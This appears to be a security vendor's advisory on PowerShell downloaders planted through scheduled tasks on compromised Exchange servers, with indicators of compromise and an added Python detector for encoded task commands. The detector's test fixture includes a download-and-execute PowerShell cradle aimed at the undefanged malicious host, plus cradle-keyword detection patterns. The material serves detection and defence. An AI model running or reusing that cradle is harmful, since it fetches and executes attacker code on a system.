
PowerShell

SpearTip | March 8th, 2021


Huntress Labs has discovered multiple partners with Exchange servers receiving malicious scheduled tasks that execute a PowerShell downloader from hxxp://p.estonine[.]com/p?e. According to Huntress Labs CEO Kyle Hanslovan, the server, hosted on Digital Ocean, resolves to the IP address 188.166.162[.]201 and delivers a base64-encoded PowerShell script.

[Embedded tweet: Kyle Hanslovan, Twitter]

Details of PowerShell Downloader

This PowerShell script is similar to a coin miner campaign that Carbon Black documented in 2019.

Huntress Labs reported their findings to Digital Ocean and to the registrar, NameCheap. After this, they discovered a fifth stage of the malware in which two Mimikatz DLLs embedded in the script are loaded or injected. Huntress has discovered over 200 compromised Exchange servers resulting from the vulnerabilities.

[Embedded tweet: Kyle Hanslovan, Twitter]
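As an added defender-side example (not code from Huntress, SpearTip or the original post), the Python below inspects an exported scheduled-task definition, decodes any PowerShell -EncodedCommand payload and flags download-cradle keywords and the downloader hostname named above. The task XML, the sample script and the helper names are constructed assumptions for illustration.

```python
import base64
import re
import xml.etree.ElementTree as ET

# Hypothetical detection helper (names are assumptions, not a real tool's API).
NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
KNOWN_BAD_HOSTS = {"p.estonine.com"}          # hostname from the report, undefanged
CRADLE = re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|Invoke-Expression"
                    r"|\bIEX\b|Net\.WebClient", re.I)
ENCODED = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.I)


def encode_ps(script: str) -> str:
    """-EncodedCommand takes base64 over the UTF-16LE bytes of the script."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


def decode_ps(blob: str) -> str:
    return base64.b64decode(blob).decode("utf-16le", errors="replace")


def inspect_task(task_xml: str) -> list:
    """One finding per <Exec> action: the command, what it really runs, and why it was flagged."""
    findings = []
    for action in ET.fromstring(task_xml).iterfind(".//t:Exec", NS):
        command = action.findtext("t:Command", default="", namespaces=NS).strip()
        args = action.findtext("t:Arguments", default="", namespaces=NS)
        match = ENCODED.search(args)
        script = decode_ps(match.group(1)) if match else args  # look past the encoding
        indicators = []
        if match and "powershell" in command.lower():
            indicators.append("encoded-command")
        if CRADLE.search(script):
            indicators.append("download-cradle")
        indicators += ["known-bad-host:" + h for h in KNOWN_BAD_HOSTS if h in script.lower()]
        findings.append({"command": command, "script": script, "indicators": indicators})
    return findings


# Constructed samples in the format `schtasks /query /xml` exports (XML declaration omitted).
CRADLE_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://p.estonine.com/p?e')"
MALICIOUS_TASK = ('<Task version="1.2" xmlns="' + NS["t"] + '"><Actions><Exec>'
                  "<Command>powershell.exe</Command><Arguments>-NoP -W Hidden -EncodedCommand "
                  + encode_ps(CRADLE_SCRIPT) + "</Arguments></Exec></Actions></Task>")
BENIGN_TASK = ('<Task version="1.2" xmlns="' + NS["t"] + '"><Actions><Exec>'
               "<Command>cleanmgr.exe</Command><Arguments>/autoclean</Arguments>"
               "</Exec></Actions></Task>")

if __name__ == "__main__":
    for task in (MALICIOUS_TASK, BENIGN_TASK):
        for finding in inspect_task(task):
            print(finding["command"], finding["indicators"], "->", finding["script"])
```

The same check can be run over every file under C:\Windows\System32\Tasks or over the output of Get-ScheduledTask; the point is to decode before matching, since the encoded form hides both the cradle and the hostname.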

SpearTip’s professionals are closely monitoring this situation as it develops. If you have any questions regarding the Exchange Server vulnerabilities, don’t hesitate to reach out to our Security Operations Center at 833.997.7327.

SpearTip’s cyber professionals continuously monitor environments 24/7 in our US-based Security Operations Center. Our certified engineers work in unison with our proprietary endpoint detection and response tool, ShadowSpear®. This allows your organization to have direct communication with our engineers at any moment and a completely transparent view of your risk profile.
